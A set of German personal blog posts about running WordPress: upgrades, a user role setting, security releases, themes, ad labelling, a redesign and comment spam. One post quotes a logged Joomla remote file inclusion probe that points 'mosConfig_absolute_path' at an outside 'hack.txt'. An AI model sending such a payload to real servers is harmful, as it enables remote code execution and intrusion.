Beiträge

Es hat lange gedauert. Bis vor wenigen Minuten hielt ich meine eigene Variante von WordPress 2.3.3 auf MikeSchnoor.com am Leben. Der Exitus musste kommen, und ich freue mich auf die segensreiche Zeit mit WordPress 2.5.1 – schneller, schöner, neuer, besser?

Ganz ehrlich – es geht so. Ich bin mit dem Admin-Interface absolut unzufrieden, doch zum Glück erspähte ich bei Frank den Hinweis auf die Plugin-Erweiterung vom Admin-Interface. Jetzt sieht alles besser aus, ein wenig bequemer und komfortabler als die für 800×600 Pixel getrimmte originale WordPress 2.5.1 Darstellung. Warum muss man sich in Zeiten von 24″ Bildschirmen noch mit solchen altbackenen Traditionen abfinden? :)

Sicherheit ist das Maß der Dinge. Ein sehr interessantes Feature stellte ich vor wenigen Minuten in der WordPress Administration fest. Sobald man im „Users“-Tab einen Benutzer editiert, hat man unter „Role“ neben den üblichen Einstellungen auch die Auswahl für „No role for this blog“. Dokumentiert ist die Funktion zumindest nicht in der Form, dass man sie schnell über Google finden kann.

Jedoch hat es die Funktion wirklich in sich, wenn man einen Benutzer im Blog behalten möchte ohne dabei seine Blogeinträge zu löschen und dem Benutzer insbesondere keine administrativen Funktionen zu überlassen. Der gesamte Loginbereich von WordPress wird für den betroffenen Nutzer gesperrt: „You do not have sufficient permissions to access this page.

Mir gefällt diese Methode eindeutig besser, als einen User zu einem Leser zu machen. Als Leser kann immer noch nachträglich der angezeigte Name (nicht Benutzername) in der WordPress Administration geändert werden. Die Vergabe eines funktionslosen Logins ist letztendlich für das öffentliche Auftreten in einem Blog ideal einsetzbar: Für privat betriebene Blogs eher kein Thema, doch in Hinblick auf Corporate Blogs kann mit dem Weggang eines Mitarbeiters die Frage auftauchen – Was machen wir jetzt mit den Blogeinträgen?

Sobald ein Mitarbeiter das Unternehmen verlässt, muss in WordPress nicht der Benutzer gelöscht werden und auch nicht die durchaus sicherheitskritische Einstellung „Registrierter Leser“ gewählt werden. Vielmehr setzt man den Benutzer auf „No role for this blog“ und bewahrt die bisherigen Blogeinträge, ohne dass daraus ein Problem generiert werden kann. Anmelden kann sich der Benutzer in dem Fall nicht mehr.

Ich nutze hier im Blog definitiv WordPress, aber zahlreiche Anfragen werden auf nicht-existente URLs gemacht, die wohl irgendwie eine Hintertür beim Joomla CMS öffnen sollen. Hier ein Beispiel:

/////////////?mosConfig_absolute_path=http://sonstwo.server.com/hack.txt

Scheinbar ist die mosConfig_absolute_path im Joomla CMS oder in veralteten Versionen absolut anfällig für zwischenmenschliche Schandtaten… naja, das wollte ich auch nur mal so mitteilen.

Freie Software ist eine Essenz des digitalen Lebens. Das wundervolle an solchen Programmen wie WordPress ist die kontinuierliche Pflege des Systems durch die mittlerweile gewaltige Community. Das aktuelle Paket behebt eine kritische Sicherheitslücke in der XML-RPC Schnittstelle. Ein Update ist zwingend erforderlich und für jeden WordPress Einsatz empfohlen.

Frohlocket und freut euch über einen neuen Schachzug des WordPress.com Teams von Automattic. Ab sofort kann jeder Nutzer des freien Bloghosters WordPress.com sich auf sagenhafte 3 GigaByte (3.000 MegaByte) an nutzbarem Speicherplatz ergötzen.

So sollen laut Matt Mullenweg die Nutzer viel bessere Möglichkeiten haben um Blogeinträge im Stil von „rich media“ zu verfassen. Bilder, Videos und Podcasts sind die bestbekanntesten Formen dieser multimedialen Unterhaltung. Ein weiteres Ziel dieses Upgrades ist es, die Konkurrenten am Markt auszustechen. Ähnlich wie Google mit GMail und dem stetig wachsenden Volumina an Speicherplatz soll auch WordPress.com seine ärgstene Konkurrenten auf dem US-amerikanischen Markt angehen. Bei Typepad zahlt man fast $300 dafür, Blogger gibt einem nur 1 GigaByte frei – da will WordPress.com nicht kleckern sondern klotzen.

Wer sich dennoch nicht auf einen dieser Accounts einschießen möchte, darf sich am kostenlosen WordPress.org bedienen, auf dem auch dieses und viele weitere Blogs auf eigenen Domains laufen.

Der preisverdächtige Fund des Tages geht an Robert und Stebu für die meiner Meinung nach geniale Liste der 100 Excellent Free WordPress Themes. Alle Themes können nahezu frei verwendet werden und sind in verschiedenen Kategorien sortiert: Die optischen Kracher sind die „Vibrant“ Themes, wer auf eher spärliche Layouts steht ist mit den Minimalistic Themes bestens bedient, der trendige Magazin Style sowie das Grid-Based Format haben es wirklich in sich, während die Calm, Clean & Legible Themes eher für klassische Optik stehen. Abgerundet wird das Repertoire durch multifunktionale Layouts, experimentelle Bastelecken sowie einige Foto- bzw. Videoblog Themes.

Beim Überfliegen dieser Themes stelle ich begeistert fest, dass man als Blogger durch die Fülle an verschiedenen Layouts und Stilen mittlerweile einen qualitativen Schub der Blogosphäre erkennen kann. Zwar kann ich mich für einen Favoriten aus der Liste nicht entscheiden, doch für den Relaunch von MikeSchnoor.com und Skykat gibt es bestimmt ein paar spaßige Anregungen, damit die Kreativität in vollen Zügen ausgeschöpft werden kann. Daher rate ich jedem Altblogger, dass er zumindest für das neue Jahr 2008 sein/ihr Blog ein wenig aufpeppt und ausmistet… sofern Zeit dafür ist.

Seit kurzem erstrahlt das Blog mit einem angepassten Layout. Eine kleine optische Änderung möchte ich jedoch hier ausdrücklich erwähnen. Ich habe mich aus verschiedenen Gründen dazu durchgerungen, die Werbebanner in diesem Blog explizit mit einer horizontalen bzw. vertikalen „WERBUNG“-Grafik zu kennzeichnen. Zwar sind die eingeblendeten Textanzeigen und Werbebanner mit einem eigenen Hinweis als „Anzeige“ betitelt, jedoch war mir das für meinen Geschmack einfach nicht genug. Vielleicht hilft das sogar, dem einen oder anderen Leser mehr Transparenz auf persönlichem Level zu veranschaulichen.

Ein Plugin von WordPress konnte ich dafür jedoch nicht finden, weil die Anzeigen hier manuell und nicht über ein lustiges Widget im Theme integriert sind. Daher bedeutete es ein wenig Testen, Ausprobieren und Rumspielen mit dem Stylesheet – wenn jemand Überlappungen in der Darstellung der einzelnen Layer feststellen sollte, freue ich mich auf eine Mail mit einem kleinen Screenshot.

Auch wenn viele Blogger gegen Werbung sind, ist das immer eine Einstellungsfrage jedes einzelnen. Meiner Erfahrung nach sind die meisten Leser sowieso technikaffine Menschen, die mit ihren eigenen Blogs rumhandtieren oder sich einen Werbeblocker für den Browser installiert haben. Macht was ihr wollt, aber eines sei gesagt: Bezahlte Artikel oder Rezensionen gibt es hier im „MikeSchnoor.com“ nicht. Einschlägige Einträge zu Unternehmensmeldungen verfasse ich in der Regel aus der puren Lust an der Sache, oder weil es jemand einfach verdient, dass man ihm mal vor den Karren fährt. :)

Für heute heißt es erstmal: Genug gespielt! Dieses Blog hat eine kleine Rundumerneuerung und eine kleine Pflegekur bekommen, damit der eigentliche Inhalt den Lesern und Besuchern außerhalb des RSS Readers auch im Webbrowser etwas angenehmer wird. Die obere Navigation wurde mit den größten Themen bzw. Kategorien des Blogs sowie der Suchfunktion bestückt, die Sidebar wurde durch überflüssige Bestandteile entschlackt und durch die Tagcloud sowie eine kleine dynamische Blog Statistik angereichert, der untere Bereich entfällt vollkommen. Außerdem versah ich die Überschriften mit einer anderen Schriftart um ein wenig mehr für das Auge zu bieten. Ich hoffe, dass die kleine Änderung ein wenig gefällt und vielleicht etwas hilfreich erscheint.

In den nächsten Tagen werde ich das gesamte Theme von Altlasten und angeschimmelten Codes befreien und es höchstwahrscheinlich komplett neu schreiben. In Kürze kommen noch automatisch über RSS einlaufende Fotos hinzu, aber das ist noch eine kleine Baustelle. Auch plane ich den viel gerühmten Magazin-Look ein wenig in das Blog zu integrieren und dies auf Basis eines eigenen individuellen Templatepaketes zu erstellen. Dazu habe ich eine separate WordPress Installation angefertigt, die das aktuelle Theme identisch aufgesetzt bekommen hat. Jede Zeile vom Code wird bereinigt und entschlackt, damit es auch für mich als Autor des Blogs in Zukunft etwas einfacher wird das Theme bei Bedarf anzupassen. Dieses große Ziel jedoch wird nur dann von Erfolg gekrönt sein, wenn unsere Tochter sich mit ihrer Geburt brav Zeit lässt und uns noch etwas Ruhe gönnt… ein wenig mehr Spaß im Web 2.0 bringt das echte Leben allemal! :)

Ein kleiner Fehler in WordPress gibt streng geheime Entwürfe/Drafts an außenstehende Nutzer frei. Dem kann man mit dem aktuellen Security Release von WordPress 2.3.2 entgegen steuern. Wer seine geschätzten Entwürfe nicht mit fremden Menschen teilen will, kann man das Update nur wärmstens empfehlen.

Einige mögliche Fehlermeldungen geben nach der Installation weniger Informationen über das Setup des Blogs preis, außerdem kann man mit dem neuesten Update sämtliche Datenbankfehlermeldungen eigenständig definieren. Dazu einfach ein eigenes Template unter wp-content/db-error.php erstellen und schon kann man ein schöneres Leben mit WordPress haben, falls die gesamte Datenbank abrauschen sollte. Autsch! :)

Spam. Spam. Spam. Wir lieben Spam… nein, wir hassen Spam! Seit ungefähr zwei Tagen ist das Aufkommen der unerwünschten Kommentare und Trackbacks so hoch wie nie zuvor. Zum Glück landet alles brav in der Moderationsschleife, aber das Spamfilter Plugin für WordPress „Akismet“ nimmt scheinbar nur die Hälfte der eingegangenen Spamkommentare war.

Die zu moderierenden Spamkommentare sind vom Aufbau und Inhalt identisch mit dem, was man bei einem Blick in die Akismet Spam Falle findet. Nahezu kein Unterschied, manche Kommentare sind sogar inhaltlich identisch bis auf die angegebenen Namen, E-Mails oder URLs. Dieses abstruse Phänomen kommt nicht nur bei diesem Blog, sondern auch bei anderen Weblogs vor, die auf aktueller WordPress 2.3.1 mit Akismet 2.1.2 basieren. Weiß jemand Rat und Tat, oder kann man von einem globalen Erstschlag der Spammer sprechen?